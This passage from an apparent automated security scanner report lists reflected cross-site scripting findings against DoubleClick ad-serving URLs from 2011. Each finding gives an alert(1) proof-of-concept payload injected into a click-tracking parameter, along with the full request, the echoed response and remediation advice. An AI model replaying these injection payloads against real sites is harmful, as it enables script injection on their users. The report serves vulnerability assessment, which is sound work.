4.101. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0165'-alert(1)-'634ccbdbc03 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236f0165'-alert(1)-'634ccbdbc03&m=1&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:19 GMT
Expires: Sat, 29 Jan 2011 05:20:19 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236f0165'-alert(1)-'634ccbdbc03&m=1&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.102. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97bd1'-alert(1)-'cb3c0dc5ffc was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=5439397bd1'-alert(1)-'cb3c0dc5ffc&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:23 GMT
Expires: Sat, 29 Jan 2011 05:20:23 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=5439397bd1'-alert(1)-'cb3c0dc5ffc&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.103. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a2e1"-alert(1)-"448534e683b was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=543933a2e1"-alert(1)-"448534e683b&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:22 GMT
Expires: Sat, 29 Jan 2011 05:20:22 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=543933a2e1"-alert(1)-"448534e683b&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false
...[SNIP]...

4.104. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 373ba'-alert(1)-'f120bbbe02 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903373ba'-alert(1)-'f120bbbe02&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5990
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:15 GMT
Expires: Sat, 29 Jan 2011 05:20:15 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7d/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903373ba'-alert(1)-'f120bbbe02&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.105. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a04f3"-alert(1)-"51bafdadbda was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903a04f3"-alert(1)-"51bafdadbda&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:15 GMT
Expires: Sat, 29 Jan 2011 05:20:15 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
scape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903a04f3"-alert(1)-"51bafdadbda&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fs
...[SNIP]...

4.106. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a25ce'-alert(1)-'cddf5d2d430 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5a25ce'-alert(1)-'cddf5d2d430&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:27 GMT
Expires: Sat, 29 Jan 2011 05:20:27 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5a25ce'-alert(1)-'cddf5d2d430&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.107. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac0ff"-alert(1)-"7e478181650 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5ac0ff"-alert(1)-"7e478181650&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:26 GMT
Expires: Sat, 29 Jan 2011 05:20:26 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5ac0ff"-alert(1)-"7e478181650&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

4.108. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3ab0'-alert(1)-'b3d4566e284 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0d3ab0'-alert(1)-'b3d4566e284&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:20 GMT
Expires: Sat, 29 Jan 2011 05:20:20 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0d3ab0'-alert(1)-'b3d4566e284&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\">
...[SNIP]...

4.109. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4f66"-alert(1)-"c200b6efce1 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0c4f66"-alert(1)-"c200b6efce1&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:19 GMT
Expires: Sat, 29 Jan 2011 05:20:19 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0c4f66"-alert(1)-"c200b6efce1&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...

4.110. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d52e'-alert(1)-'5e41e6817f1 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=4d52e'-alert(1)-'5e41e6817f1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5797
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:23 GMT
Expires: Sat, 29 Jan 2011 05:20:23 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=4d52e'-alert(1)-'5e41e6817f1http://www.dawnrecetas.com\">
...[SNIP]...

4.111. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe2fe"-alert(1)-"e1eaa27e27d was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=fe2fe"-alert(1)-"e1eaa27e27d HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5797
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:22 GMT
Expires: Sat, 29 Jan 2011 05:20:22 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=fe2fe"-alert(1)-"e1eaa27e27dhttp://www.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;

...[SNIP]...

4.112. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bd16'-alert(1)-'d5fd3def361 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=61bd16'-alert(1)-'d5fd3def361&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:15 GMT
Expires: Sat, 29 Jan 2011 05:20:15 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=61bd16'-alert(1)-'d5fd3def361&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\">
...[SNIP]...

4.113. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c29"-alert(1)-"d32825b59b7 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6a9c29"-alert(1)-"d32825b59b7&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:14 GMT
Expires: Sat, 29 Jan 2011 05:20:14 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6a9c29"-alert(1)-"d32825b59b7&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

4.114. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b27c"-alert(1)-"b0efc15adcb was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=5215548b27c"-alert(1)-"b0efc15adcb&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3a9e/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=5215548b27c"-alert(1)-"b0efc15adcb&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

...[SNIP]...

4.115. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
